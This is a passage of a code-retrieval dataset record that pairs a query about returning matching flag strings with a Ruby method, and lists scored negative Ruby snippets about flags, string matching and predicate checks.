"def no?\r\n input.to_s[0,1].downcase == 'n' or input.to_i == 2\r\n end",
"def find?(word)\n !find(word).empty?\n end",
"def hit_itself?\n # list.uniq removes all repeated elements from a list\n @positions.uniq.length != @positions.length\n end",
"def negative?(word)\n [ 'dull',\n 'boring',\n 'annoying',\n 'chaotic'\n ].include?(word)\nend",
"def pair_not_overlapping?\n !(self.match(/([a-z][a-z]).*\\1/)).nil?\n end",
"def judge_signal(instance,signal,noneqList_custom)\n flag = true\n noneqList_custom.each do |inst,data|\n if inst == instance\n flag = false unless data.noneq_points.index(\"#{signal}\").nil?\n flag = false unless data.nocor_points.index(\"#{signal}\").nil?\n end\n end\n return flag\n end",
"def stop_if_match; true; end",
"def unique(suffix) \n check = Url.where(suffix: suffix).first\n if check == nil\n return true\n else\n return false\n end\n end",
"def uniquely_identified_by_any_peptides?\n unique_spectra > 0\n end",
"def non_nil?(item)\n !self[item].nil?\n end",
"def mem(key)\n nil == find(key)\n end",
"def match(n)\n str = n.to_s\n return false unless str[0] == 1.to_s\n return false unless str[2] == 2.to_s\n return false unless str[4] == 3.to_s\n return false unless str[6] == 4.to_s\n return false unless str[8] == 5.to_s\n return false unless str[10] == 6.to_s\n return false unless str[12] == 7.to_s\n return false unless str[14] == 8.to_s\n return false unless str[16] == 9.to_s\n return true\nend",
"def not_found?\n @flags.empty?\n end",
"def terminal?\n matches.length == 0\n end",
"def methodChecksIfStringUnique(parameter_string) \n\thash_to_return = {}\n\n\tparameter_string.each_char do |char|\n\t\thash_to_return[char].nil? ? hash_to_return[char] = true : (return false)\n\tend\n\n\ttrue\n\t\nend",
"def match\n true\n end",
"def found?\n return false if no_search\n\n id.present? || records.present?\n end",
"def legal_check(a,b) \n legal=[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"J\",\"Q\",\"K\",\"A\"]\n \n if b==nil # || b==nil (i think this works)\n puts \"Invalid move!\"\n return false\n elsif (b==\"1\" || b==\"2\" || b==\"3\" || b==\"4\") && a==nil #doesnt work\n return true #doesnt work\n elsif (legal.index(a)-legal.index(b)).abs<=1\n return true\n elsif a==\"2\" && b==\"A\"\n return true\n elsif a==\"A\" && b==\"2\"\n return true\n else\n puts \"Illegal move!\"\n return false\n end\nend",
"def matches(value)\n output, status = provider.run_unless_sql_command(value)\n output='0' unless status == 0\n\n result_count = output.strip.to_i\n self.debug(\"Found #{result_count} row(s) executing 'unless' clause\")\n result_count > 0\n end",
"def exact?\n !!@repeat\n end",
"def unique_number(arr)\n existing_numbers = []\n not_unique = []\n arr.each do |entry|\n if existing_numbers[entry] === nil\n existing_numbers[entry] = true\n else\n not_unique[entry] = true\n end\n end\n arr.each do |entry|\n if not_unique[entry] == nil\n return entry\n end\n end\nend",
"def unknow\r\n return false unless unknow?\r\n @unknow.shift\r\n end",
"def hyphen_absent?\r\n aba_routing_no_frm_db_with_hyphen = @micr_line_info.aba_routing_number.match(/[\\-]/)\r\n payer_account_no_frm_db_with_hyphen = @micr_line_info.payer_account_number.match(/[\\-]/)\r\n hyphen_absent = aba_routing_no_frm_db_with_hyphen == nil &&\r\n payer_account_no_frm_db_with_hyphen == nil\r\n end",
"def one_off?(win_number,my_number)\n\tmatches = 0\n\tif win_number[0] == my_number[0]\n\t\tmatches +=1\n\tend\n\tif win_number[1] == my_number[1]\n\t\tmatches +=1\n\tend\n\tif win_number[2] == my_number[2]\n\t\tmatches +=1\n\tend\n\tif win_number[3] == my_number[3]\n\t\tmatches +=1\n\tend\n\tif matches == 3\n\t\ttrue\n\telse\n\t\tfalse\n\tend\n\t\t#compare each digit of my entry to winning entry\n\t\t#if item == my_number\nend",
"def double?\n if self.id\n return true if self.torrent_url && Torrent.not_self(self.id).find_by_torrent_url(self.torrent_url)\n return true if self.transmission_hash_string && Torrent.not_self(self.id).find_by_transmission_hash_string(self.transmission_hash_string)\n return true if self.name && Torrent.not_self(self.id).find_by_name(self.name)\n else\n return true if self.torrent_url && Torrent.find_by_torrent_url(self.torrent_url)\n return true if self.transmission_hash_string && Torrent.find_by_transmission_hash_string(self.transmission_hash_string)\n return true if self.name && Torrent.find_by_name(self.name) \n end\n \n \n return false\n end",
"def near_match?(choice)\n @comp.code_combination.include?(choice)\n end",
"def is_negative?\n return NEGATIVE_RESPONSES.include?(self)\n end",
"def normal?\n (not wildcard?) and (not absorbent?)\n end",
"def loose_match?(unit)\n return false if @type != unit.type\n return false if custom? && @custom_name.casecmp(unit.custom_name) != 0\n true\n end",
"def found_using_numeric_id?\n !found_using_friendly_id?\n end",
"def unigram_exists(word)\n\t$unigrams.each do |x|\n\t\tif x.matches(word)\n\t\t\tx.increase_count\n\t\t\treturn true\n\t\tend\t\n\tend\n\treturn false\nend",
"def same_or_dif? card_arr\n card_arr.uniq.size != 2\nend",
"def includedOnce(haystack, needle)\n \n counter = haystack.count { |x| x == needle}\n if counter == 1\n return true\n elsif counter > 1\n return false\n else\n return false\n end\n \nend"
] | [
"0.62677383",
"0.6039822",
"0.58324856",
"0.5694558",
"0.55955046",
"0.5581306",
"0.55777735",
"0.5427091",
"0.5362162",
"0.5359665",
"0.535418",
"0.52943647",
"0.52836794",
"0.5280835",
"0.5261147",
"0.524693",
"0.5243467",
"0.52339256",
"0.5231494",
"0.5227676",
"0.5221369",
"0.5221369",
"0.5221369",
"0.5208174",
"0.52028364",
"0.52028364",
"0.51886284",
"0.51886284",
"0.51441085",
"0.51418865",
"0.5124628",
"0.51175773",
"0.5116688",
"0.5110124",
"0.5103182",
"0.509935",
"0.5098431",
"0.50731516",
"0.5068426",
"0.50632757",
"0.50139886",
"0.50114393",
"0.500883",
"0.50003755",
"0.49789903",
"0.49663922",
"0.4964738",
"0.49513337",
"0.49472553",
"0.49471185",
"0.4937786",
"0.49315357",
"0.49241847",
"0.4915735",
"0.49117985",
"0.49117985",
"0.4911524",
"0.4911365",
"0.48935264",
"0.48864838",
"0.48801872",
"0.48778373",
"0.48330685",
"0.48000056",
"0.47982875",
"0.4794915",
"0.47916177",
"0.4774147",
"0.47733238",
"0.47675163",
"0.4761703",
"0.4741",
"0.47359818",
"0.47113013",
"0.47079104",
"0.4706767",
"0.47051793",
"0.47012776",
"0.46978766",
"0.4693617",
"0.46863183",
"0.46831185",
"0.46699032",
"0.46655878",
"0.46603996",
"0.4658894",
"0.46453938",
"0.46439356",
"0.46396294",
"0.46383524",
"0.46371928",
"0.46279848",
"0.4623671",
"0.46209267",
"0.46163392",
"0.46133333",
"0.46076852",
"0.46067515",
"0.45983496",
"0.4596319"
] | 0.68606395 | 0 |
Returns an array of the matching full flag strings. | def matching_flag_strings
@flags.map do |_flag, flag_syntax, negative|
negative ? flag_syntax.negative_flag : flag_syntax.positive_flag
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def get_flags(*files)\n matches = []\n begin\n files.each do |f|\n file = File.new(f, 'r')\n while (line = file.gets)\n m = line.match(/(^.*=)?/)\n matches << m[0] if m\n end\n file.close\n end\n rescue => err\n puts 'Exception: #{err}'\n err\n end\n matches.uniq.sort!\nend",
"def flags\n flags = Array.new\n if self.flag_attr\n self.flag_attr.split(\", \").each do |flag|\n flags << flag.to_sym\n end\n end\n\n return flags\n end",
"def flag\n flags.join(\", \")\n end",
"def to_argv\n flags = []\n each do |f,v|\n m = f.to_s.size == 1 ? '-' : '--'\n case v\n when Array\n v.each{ |e| flags << \"#{m}#{f}='#{e}'\" }\n when true\n flags << \"#{m}#{f}\"\n when false, nil\n # nothing\n else\n flags << \"#{m}#{f}='#{v}'\"\n end\n end\n flags\n end",
"def flags\n return [] unless options[\"flags\"]\n options[\"flags\"].map do |options|\n Flag.new options\n end\n end",
"def elementary_flag_names\n flagset_builder.elementary_flag_names\n end",
"def form_flagstring(f, fall)\n\t\tflagSelectAll = (!fall.nil? && fall.to_s.downcase == \"all\")\n\t\tif(flagSelectAll || f.nil? || f.empty?)\n\t\t\tflagStr = \"all\"\n\t\telse\n\t\t\tflagStr = f.join(\"|\")\n\t\tend\n\n\t\treturn flagStr\n\tend",
"def generate_cli_flags\n @flags.map{|pair| pair.join(' ')}.join(' ').gsub(' true','')\n end",
"def mask_array\n @mask.split('')\n end",
"def _flag_nations\n %w{ar cc it de ie fr es en goo br po pt }.sort\nend",
"def get #:nodoc:\n p = Array.new\n p.push(@long_form)\n p.push(@short_form) if @short_form != \"\"\n p.push(@arg_flag)\n return p\n end",
"def flags\n [long, short].compact\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def extract_flags\n @flags.clear\n rules.each_with_index do |r, i|\n @flags << i unless r.alternatives.size == 1\n end\n end",
"def flag_args(ci_gcc_config)\n return [] if ci_gcc_config[:flags].nil?\n\n ci_gcc_config[:flags]\n end",
"def flags\n @flags ||= Set.new([])\n end",
"def normalize_flags(flags)\n if flags.is_a?(Array)\n flags.uniq.sort.join(' ')\n else\n flags\n end\n end",
"def scm_flags\n @flags.join(\" \")\n end",
"def check_patterns\n [@check_patterns].flatten.compact.uniq\n end",
"def symbols\n @flags.keys\n end",
"def flags\n [long, negative_long, short].compact\n end",
"def get_flag_path_array problem, solution, comment, flag\n if solution.nil?\n path = [problem, comment, flag]\n elsif comment.nil?\n path = [problem, solution, flag]\n else\n path = [problem, solution, comment, flag]\n end\n path\n end",
"def flags\n # Hash#index becomes Hash#key in Ruby 1.9.\n index_method = RUBY_VERSION < '1.9' ? :index : :key\n # Map the integer @flags to array of flag symbols\n # (This may be cute but it's not very efficient!)\n [ @flags ].flatten.first.to_s(2). # extract flags as binary string\n split(//).map{ |bit| bit.to_i }. # convert to array of bits\n reverse. # reverse order to work from lsb\n inject([]) { |r,v| r << v * (1 << r.length) }. # convert each bit to decimal\n reject { |flag| flag == MAGIC_FLAGS[:none] }. # discard MAGIC_NONE flag\n map { |int_flag| MAGIC_FLAGS.send(index_method, int_flag) } # map decimal integer to symbol\n end",
"def whitelisted_flags\n flags.select &:allowed\n end",
"def resolve_flag(str)\n result = Flag::Resolution.new(str)\n flags.each do |flag_def|\n result.merge!(flag_def.resolve(str))\n end\n result\n end",
"def string_matchers()\n []\n end",
"def canonical_syntax_strings\n @canonical_syntax_strings ||= flag_syntax.map(&:canonical_str)\n end",
"def match(array_of_words)\n matches = [] #Flag\n anagram_execute = anagram.split(//)\n anagram_execute = anagram_execute.sort!\n array_of_words.each do |possible_match|\n array_of_letters = possible_match.split(//)\n array_of_letters = array_of_letters.sort!\n matches << possible_match if array_of_letters == anagram_execute\n #use truncated, cleaner if statement\n end\n matches #return the matches array\n end",
"def dashed_flags *settings_and_names\n settings_and_names.map{|args| dashed_flag_for(*args) }.compact\n end",
"def effective_flags\n @effective_flags ||= flag_syntax.flat_map(&:flags)\n end",
"def flags\n FLAGS.find_all{ |k,v| (self.Characteristics & k) != 0 }.map(&:last)\n end",
"def test_extended_patterns_no_flags\n [\n [ \".*\", \"abcd\\nefg\", \"abcd\" ],\n [ \"^a.\", \"abcd\\naefg\", \"ab\" ],\n [ \"^a.\", \"bacd\\naefg\", \"ae\" ],\n [ \".$\", \"bacd\\naefg\", \"d\" ]\n ].each do |reg, str, result|\n m = RustRegexp.new(reg).match(str)\n puts m.inspect\n unless m.nil?\n assert_equal result, m[0]\n end\n end\n end",
"def match_folder_flags(flags, symbols)\n (flags & Array(symbols).map{|f| f.to_s.downcase.to_sym}.compact).any?\n end",
"def aggressive\n\t# make a matches array. this returns the equivalent of the matches[] block above\n\tm=[]\n\n\n\t# return the matches array, even if it's emtpy\n\tm\nend",
"def to_s\n @flags.join(', ')\n end",
"def flags_to_string(f)\n result = ''\n f.each { |key,value|\n if value then result=result+key end\n }\n return result\nend",
"def has_all_flags?(flag_names)\n flag_names.all? { |flag_name| has_flag?(flag_name) }\n end",
"def flags\n @flags ||= Array.wrap(Flag.where(:published => true))\n end",
"def flags(path)\n if @manifest_entry ||= nil\n return manifest_entry.flags[path] || \"\"\n end\n pnode = parents[0].raw_changeset[0]\n \n orig = @repo.dirstate.copy_map[path] || path\n node, flag = @repo.manifest.find(pnode, orig)\n return @repo.dirstate.flags(@repo.working_join(path))\n end",
"def xlate_flags()\n flags = []\n flags.push('Single Connection') if (flag_single_connection?)\n flags.push('Unencrypted') if (flag_unencrypted?)\n return(flags.join(', ')) if (flags.length != 0)\n return(\"None\")\n end",
"def generate_flags_flat overrides = {}\n generate_flags(overrides).map { |k, v| [k, v] }.concat(%w|--force .|).flatten\n end",
"def long_flag_syntax\n @long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }\n end",
"def extract_command_flags!(parameters)\n raw_command_flags = parameters.flatten.find_all { |arg| arg.start_with? \"--\" }\n parameters.delete_if { |param| raw_command_flags.include? param }\n\n flag_names = raw_command_flags.map { |flag| flag[/--(.+)$/,1].underscore.to_sym }\n flag_values = [ true ] * flag_names.count\n Hash[flag_names.zip(flag_values)]\n end",
"def make_flag(options)\n\tflagString=\" \"\n\tif(options.list != nil)\n\t\tflagString+=\" -l\"\n\tend\n\tif(options.all != nil)\n\t\tflagString+= \" -a\"\n\tend\n\treturn flagString\nend",
"def parse_flags(msg)\n msg.scan(/-(\\w+)\\s*([^-]+)?/)\n .uniq{ |e| e[0] }\n .map{ |k, v| [k, v.nil? ? nil : v.squish] }\n .to_h\n .symbolize_keys\nend",
"def test_multi_stringflag_as_strings\n opts = @p.parse %w(--xyz dog --xyz cat)\n assert_equal true, opts[:xyz_given]\n assert_equal [\"dog\",\"cat\"], opts[:xyz]\n assert_equal [], opts[:abc] # note, multi-args default to empty array\n assert_nil opts[:ghi_given]\n assert_equal [\"gg\",\"hh\"], opts[:ghi]\n end",
"def short_flag_syntax\n @short_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :short }\n end",
"def find_all_regex(sCOMMAND)\n array = Array.new()\n search =/#{sCOMMAND}/\n @commands.each do |command|\n if (command.commandName.match(search) )\n array.push(command)\n end\n\n end\n return array\n end",
"def names\n fs = []\n %w( OUT_OF_ORDER_EXEC_MODE_ENABLE PROFILING_ENABLE ON_DEVICE ON_DEVICE_DEFAULT ).each { |f|\n fs.push(f) if self.include?( self.class.const_get(f) )\n }\n return fs\n end",
"def pattern_indexes\n self.bits ||= 0\n array = bits.to_s(2).rjust(self.step_count, '0').chars.each_with_index.map do |value, index|\n index if value == '1'\n end\n array.compact\n end",
"def begins_with_r(array)\n array.all? do |tool|\n tool.start_with?(\"r\")\nend\nend",
"def get_letter_mask(array, valid_array)\n array = array.split(/[ ,\\.:;\\-+]/) if array.class != Array\n \n str = ''\n array.each do |word|\n word.upcase!\n next if word == 'AND'\n str += word[0].chr if valid_array.include? word[0].chr\n end\n return str\n end",
"def required_flags\n flags.select &:required\n end",
"def get_all_with(s)\n a = []\n self.each do |x|\n if x.include?(s)\n a << x\n end\n end\n return a\n end",
"def fflags\n set = FFI::MemoryPointer.new :ulong\n clear = FFI::MemoryPointer.new :ulong\n C.archive_entry_fflags(entry, set, clear)\n\n [set.get_ulong(0), clear.get_ulong(0)]\n end",
"def flags\n if variables\n (variables[:all][:referenced_enables] + variables[:all][:set_enables]).uniq.sort do |x, y|\n x = x[0] if x.is_a?(Array)\n y = y[0] if y.is_a?(Array)\n # Need to use strings for the comparison as some flags can be a string and some a symbol\n x.to_s <=> y.to_s\n end\n end\n end",
"def cpu_flags\n cpuinfo = cmd_exec('cat /proc/cpuinfo').to_s\n\n return unless cpuinfo.include? 'flags'\n\n cpuinfo.scan(/^flags\\s*:(.*)$/).flatten.join(' ').split(/\\s/).map(&:strip).reject(&:empty?).uniq\n rescue\n raise'Could not retrieve CPU flags'\n end",
"def patterns\n\t\t@@patterns ||= []\n\n\t\tif @@patterns.size == 0\n\t\t\tfor i in 0..9\n\t\t\t\tfor j in 0..9\n\t\t\t\t\tfor k in 0..9\n\t\t\t\t\t\tfor l in 0..9\n\t\t\t\t\t\t\t@@patterns << Regexp.new(\"[#{i}]{4}[#{j}]{4}[#{k}]{4}[#{l}]{4}\")\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\t@@patterns\n\tend",
"def glob(pattern, flags = T.unsafe(nil)); end",
"def strings\n [\n build_identification_string,\n build_flags_string,\n build_info_string,\n build_name_string\n ].compact\n end",
"def matching_opts(arg, list, i)\n\t\t# Returns field of all exactly or abbreviated matching options.\n\t\tm = @option.values.select { |o| o.match?(arg, list, i) == :exact }\n\t\tif m.empty?\n\t\t\t@option.values.select { |o| o.match?(arg, list, i) == :abbrev }\n\t\telse\n\t\t\tm\n\t\tend \n\tend",
"def get_flag_name(flag)\n if flag.start_with?(\"--no-\")\n flag[5..-1]\n elsif flag.start_with?(\"--\")\n flag[2..-1]\n else\n raise \"Assertion error: we're here by mistake\"\n end\nend",
"def get_matching_strings(prefix)\n puts \"Matching for #{prefix}\"\n ptr = @root\n for i in 0..prefix.size-1\n ptr = ptr.children[prefix[i]]\n return nil unless ptr\n end\n arr = []\n arr << prefix if ptr.is_leaf\n arr << get_strings(ptr, prefix)\n arr\n end",
"def search pattern\n\t\tresults = all.map {|key|\n\t\t\tkey if key.to_s =~ /#{pattern}/i\n\t\t}\n\t\tresults.delete nil\n\t\tresults\n\tend",
"def matches(smarts_or_string, uniq=true)\n each_match(smarts_or_string, uniq).map.to_a\n end",
"def bmAltGoodSuffixTable(pattern)\n pattern = pattern.unpack('U*')\n goodSuffix = []\n pattern.length.times do |i| \n value=0 \n while (value < pattern.length && !suffixmatch(pattern, i, value)) do \n value+=1 \n end \n goodSuffix[pattern.length-i-1] = value \n end \n return goodSuffix\nend",
"def list(pattern = /.*/)\n if Gem::Specification.respond_to?(:each)\n Gem::Specification.select{|spec| spec.name =~ pattern }\n else\n Gem.source_index.gems.values.select{|spec| spec.name =~ pattern }\n end\n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
"def lookup(glob, flags=0)\n pwd = File.expand_path(Dir.pwd)\n home = File.expand_path('~')\n while pwd != '/' && pwd != home\n paths = Dir.glob(File.join(pwd, glob), flags)\n return paths unless paths.empty?\n break if ROOT_INDICATORS.any?{ |r| File.exist?(File.join(pwd, r)) }\n pwd = File.dirname(pwd)\n end\n return []\n end",
"def bitmask(int)\n return int.to_s(2).reverse.split('')\n end",
"def includedirs\n res = []\n @flags.each { |f| res.push f if f =~ /^-I/ }\n res.join \" \"\n end",
"def flags_resync\n if @flags\n self.class.flag_def.each do |f|\n sym = (f.flag_type=='Symbol' ? f.flag_name.to_sym : f.flag_name)\n i,p,v = self.class.index_position_value(f.position)\n sn=self.send(\"flags_#{i}\")||0\n b = sn & v > 0\n logger.warn \"#{@flags[sym].class} value '#{@flags[sym]}' for flag #{self.class}->#{sym} will be stored as true, not '#{@flags[sym]}'\" unless FlaggableTypes.include?(@flags[sym].class)\n if @flags[sym] && !b\n self.send(\"flags_#{i}=\",sn+v)\n elsif b && !@flags[sym]\n self.send(\"flags_#{i}=\",sn-v)\n end\n end\n end\n @flags\n end",
"def join(seperator = \" | \")\n\t\tflags.map { |flag| flag.name }.join(seperator)\n\tend",
"def begins_with_r(array)\n array.all? {|word| word.start_with?(\"r\")}\nend",
"def flags(path)\n info = file_info(path)[1]\n return \"\" if info.nil?\n info\n end",
"def feature_flags_for(*flag_names)\n flag_names.map { |flag_name| feature_flag_as_hash(flag_name) }.reduce({}, :merge).with_indifferent_access\n end",
"def all_names(format)\n alts = alternates.select { |a| a.include? format }.flatten\n alts.any? ? alts : [format]\n end",
"def names\n fs = []\n %w( COARSE_GRAIN_BUFFER FINE_GRAIN_BUFFER FINE_GRAIN_SYSTEM ATOMICS ).each { |f|\n fs.push(f) if self.include?( self.class.const_get(f) )\n }\n return fs\n end",
"def available_go_cabs\n arr = []\n @go_cabs.select { |cab| arr << cab if (cab.available == true) }\n return arr\n end",
"def matches( input )\n matches = Array.new\n\n input.shorter.each_with_index do |char, idx|\n input.window_range( idx ).each do |widx|\n if input.longer[widx] == char then\n matches << widx\n break\n end\n end\n end\n\n return matches\n end",
"def flag_for(tag)\n return @flags.detect { |flag| flag.tag == tag}\n end",
"def all_flags\n res = get_request 'features'\n if res.status == 200\n JSON.parse(res.body, symbolize_names: true)\n else\n @config.logger.error(\"[LDClient] Unexpected status code #{res.status}\")\n {}\n end\n end",
"def all_flags\n res = get_request 'features'\n if res.status == 200\n JSON.parse(res.body, symbolize_names: true)\n else\n @config.logger.error(\"[LDClient] Unexpected status code #{res.status}\")\n {}\n end\n end",
"def get_all_strings\n return @stringpool_main.values\n end",
"def strings_for_select( *_array)\n _array = _array.flatten\n if _array.blank?\n []\n else\n _array.zip _array\n end\n end",
"def as_flag_collection(colmn = DEFAULT_COLUMN_NAME, *args)\n flags_to_collect = args.empty? ? all_flags(colmn) : args\n collect_flags(*flags_to_collect) do |memo, flag|\n memo << [flag, flag_enabled?(flag, colmn)]\n end\n end",
"def patterns\n #@rules.every.pattern\n @rules.map {|r| r.pattern }\n end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def file_patterns\n [@file_patterns].flatten.compact.uniq\n end",
"def begins_with_r(array)\n array.all? { |word| word.start_with?(\"r\") }\nend",
"def flag_hash\n flags.to_s.split(\", \").each_with_object({}) do |flag, hash|\n k, v = flag.split(\"=\")\n hash[k] = v\n end\n end",
"def get_patterns\n patterns = BASE_PATTERNS\n # add the colour keywords. generate these from the colour wheel's constants\n colours = Yay::ColourWheel::all_names.join('|')\n patterns.unshift [:colour, Regexp.new(\"\\\\b(#{colours})\\\\b\", Regexp::IGNORECASE)]\n return patterns\n end",
"def begins_with_r(tools)\n result = nil\n tools.each {|tool| result = tool.start_with?(\"r\")}\n result\nend",
"def state_match\n states = %w(mn ak hi id mt wy ut nm tx ks \n ok nb sd nd ia ar la ms ab wi\n tn ky in oh pn wv md va nc sc\n ga de nj ct ri ma vt nh ma il\n ca co az nv fl mi ny or wa mo)\n eval states.map {|x| \"stri('#{x}')\"}.join(' | ')\n end",
"def command_keywords\n dir_path = File.dirname(__FILE__)\n dirs = Dir.entries(dir_path)\n command_file_names = dirs.select{ |x| x.start_with?('_')}\n command_file_names.collect {|x| x.sub(/^_/, '')}\nend",
"def build_character_array(character_bytes, character)\n character_bytes\n .select { |sub_array| sub_array.include?(character) }\n .flatten\nend"
] | [
"0.7122982",
"0.7122982",
"0.6619203",
"0.649433",
"0.60035",
"0.60031104",
"0.59638727",
"0.59401083",
"0.5879179",
"0.5834999",
"0.580956",
"0.5784173",
"0.5769756",
"0.5763876",
"0.5746046",
"0.56907606",
"0.56907606",
"0.5672787",
"0.56592214",
"0.5626698",
"0.5591124",
"0.5549991",
"0.5524209",
"0.55039483",
"0.5495406",
"0.54867506",
"0.5451067",
"0.54295194",
"0.54088753",
"0.53739744",
"0.5363532",
"0.53371966",
"0.53200734",
"0.5305586",
"0.5283986",
"0.52736497",
"0.5270734",
"0.5260065",
"0.5250012",
"0.5242983",
"0.5226725",
"0.52179366",
"0.5204357",
"0.51642823",
"0.5158985",
"0.513026",
"0.5115764",
"0.51079744",
"0.510431",
"0.5100178",
"0.5084337",
"0.5057118",
"0.50567216",
"0.5049098",
"0.5046512",
"0.50395006",
"0.5036575",
"0.5033242",
"0.5028547",
"0.50023943",
"0.49975964",
"0.4988271",
"0.4988093",
"0.4971955",
"0.49712822",
"0.49604568",
"0.4959473",
"0.49590153",
"0.49517447",
"0.4951206",
"0.49416655",
"0.49401066",
"0.49286765",
"0.49253574",
"0.49024814",
"0.48982137",
"0.489774",
"0.48950702",
"0.48946834",
"0.4891862",
"0.48862574",
"0.48846394",
"0.48811918",
"0.48810583",
"0.48794392",
"0.48788488",
"0.48788488",
"0.48787722",
"0.48755",
"0.4873967",
"0.48674232",
"0.48626506",
"0.48560634",
"0.48453435",
"0.4839437",
"0.4837345",
"0.48355174",
"0.48338112",
"0.4830821",
"0.4821484"
] | 0.7852811 | 0 |
Whether to include short flags | def include_short?
@include_short
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def short_flag_syntax\n @short_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :short }\n end",
"def short_flag_exist?(flag)\n flags.select { |f| f.short == flag }.any?\n end",
"def flags\n [long, short].compact\n end",
"def short\n @short\n end",
"def short?\n !(@short.nil? || @short.empty?)\n end",
"def short; end",
"def flags\n [long, negative_long, short].compact\n end",
"def test_short\n LinuxFortune.short = true\n assert LinuxFortune.short # short should be set to true\n assert LinuxFortune.long == false # long to false\n assert LinuxFortune.fortune_options.include?(\"-s\")\n assert LinuxFortune.fortune_options.include?(\"-n\") || LinuxFortune.short_length == 160\n 10.times do # check multiple times if the generated length is ok\n lf = LinuxFortune.generate\n assert lf.body.size*0.9 < LinuxFortune.short_length # check if actual size is less than the max. short length\n end\n end",
"def general_purpose_flags\n 0b0000000000000001\n end",
"def flag(short_name, long_name, description, &block)\n\t\t\treturn define_value(short_name, long_name, description, true, false, block)\n\t\tend",
"def include_long?\n @include_long\n end",
"def format_boolean_flag(flag, small=false)\n css_small = small == true ? 'boolean-flag-xs' : ''\n if flag == true\n return \"<div class='boolean-flag boolean-flag-true #{css_small}'>#{t('shared.common.yes')}</div>\".html_safe\n else\n return \"<div class='boolean-flag boolean-flag-false #{css_small}'>#{t('shared.common.no')}</div>\".html_safe\n end\n end",
"def short(options = T.unsafe(nil)); end",
"def short(*shorts)\n format = ( little_endian? ? 'v*' : 'n*') \n return string(shorts.pack(format)) \n end",
"def get_new_short?\n return self.new_short?\n end",
"def short_for_optparse\n (arg and long.nil?) ? (\"%s %s\" % [short, arg]) : short\n end",
"def full?\n flags & 0x2 == 0x2\n end",
"def flags; end",
"def shortlist?\n !shortlist_complete\n end",
"def read_short(signed = false, mut = :STD, order = :BIG)\n val = 0\n case order\n when :BIG\n val |= read_byte(signed) << 8\n val |= read_byte(signed, mut)\n when :LITTLE\n val |= read_byte(signed, mut)\n val |= read_byte(signed) << 8\n end\n val\n end",
"def server_flags; end",
"def general_purpose_flags\n 0b0000000000000000\n end",
"def show_style\n :short\n end",
"def is_flagged?(feature)\n flags.include?feature\n end",
"def std_flags\n # FIXME: this is bogus\n m = method(:help_text)\n boolean :help, :flag => \"h\", :doc => \"display this help\"\n boolean :verbose, :flag => \"v\", :doc => \"verbose output\"\n boolean :debug, :flag => \"D\", :doc => \"turn on debugging\"\n end",
"def fast?\n settings['fast']\n end",
"def flags?\n !@flags.empty?\n end",
"def short\n Util.from_bytes :short, value\n end",
"def suitable?(short = true)\n return(short ? confine_collection.valid? : confine_collection.summary)\n end",
"def short_form!\n options[:form] = 'short'\n self\n end",
"def complete_flags?\n @complete_flags\n end",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def short_binary_type; end",
"def has_flag(u, f)\n ret = false\n @opers.each do |oper|\n if oper.can_access(u)\n puts(\"flags: #{oper.flags}\") if $config.options['debug']\n ret = oper.flags.include?(f) || oper.flags.include?('*')\n end\n end\n\n if !ret && $config.options['levels'] && (u.isoper || u.isadmin)\n puts(\"lflags: #{$config.levels[u.olevel]}\")\n ret = $config.levels[u.olevel].include?(f)\n end\n \n return ret\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def shortened\n @shortened ||= shorten\n end",
"def allow_short_words\n not @emphasis[:ignore_short_words]\n end",
"def folly_flags()\n return NewArchitectureHelper.folly_compiler_flags\nend",
"def show_elf_flags\n\t\t\t\tputs \" Flags: #{@elf_flags.to_h}\"\n\t\tend",
"def has_add\n return @has_add unless @has_add.nil?\n @has_add = (flags & 32768) != 0\n @has_add\n end",
"def apphelp_boolean( bool )\n apphelp_generic( bool ? :yes : :no )\n end",
"def create_sound_get_flags(flags)\n return (flags | FMOD::MODE::OPENMEMORY | FMOD::MODE::CREATESTREAM) if flags\n return (FMOD::MODE::LOOP_NORMAL | FMOD::MODE::FMOD_2D | FMOD::MODE::OPENMEMORY | FMOD::MODE::CREATESTREAM)\n end",
"def full full\n @options[:full] = booleanize 'Full', full\n self\n end",
"def long_flag_syntax\n @long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }\n end",
"def flagging\n @title = 'Flags and their meaning'\n @css = 'flags.css'\n end",
"def flag(name,aliases,desc,long_desc,default_value,arg_name,must_match,type)\n abstract!\n end",
"def switches\n [long, negative_long, short].compact\n end",
"def write_short(file, short, md)\n short = [short].pack('n')\n md << short\n file.write(short)\n end",
"def flagged?\n !(%w(flagged) & flags).empty?\n end",
"def feature_flags\n 0\n end",
